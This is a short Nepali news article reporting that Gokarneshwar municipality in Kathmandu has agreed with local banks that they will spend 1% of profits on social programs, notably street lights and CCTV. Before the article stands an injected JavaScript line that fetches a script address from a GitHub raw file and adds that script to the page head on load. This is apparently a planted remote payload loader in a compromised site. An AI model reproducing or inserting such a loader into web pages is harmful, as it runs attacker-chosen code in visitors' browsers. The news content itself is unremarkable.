;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
काठमाडौँ गोकर्णेश्वर नगरपालिकाले यस क्षेत्र भित्र भएका बैंकहरु संग साझेदारी गर्ने निर्णय गरेको छ | सबै बैंकहरुले आफ्नो मुनाफाको १ प्रतिशत सामाजिक उत्तरदायित्वमा खर्च गर्नु पर्ने प्राबधान अनुसार यस क्षेत्रमा रहेका बैंकहरुले गोकर्नेश्वर नगरपालिकाको शिक्षा, स्वास्थ्य, खानेपानी, बातावरण, कृषि, खेलकुद लगायतको क्षेत्रमा सहयोग गर्ने निर्णय भएको हो |
बिशेष गरि सडक बत्ति र सिसि क्यामेराको जडानमा बैंकहरुले सहयोग गर्ने भनिएको छ |
भद्र ११ गते यस नगरपालिका भित्र रहेका सबै बैंकहरुका म्यनेजर सहित नगरपालिकाका मेयर दिपक रिसाल, उपमेयर सान्नानी लामा, प्रमुख प्रशासकीय अधिकृत याम नारायण गौली, प्रशासन साखा प्रमुख भुपेन्द्र बोहरा सहित बैठक बसेको थियो |
फेसबुक प्रतिक्रियाहरु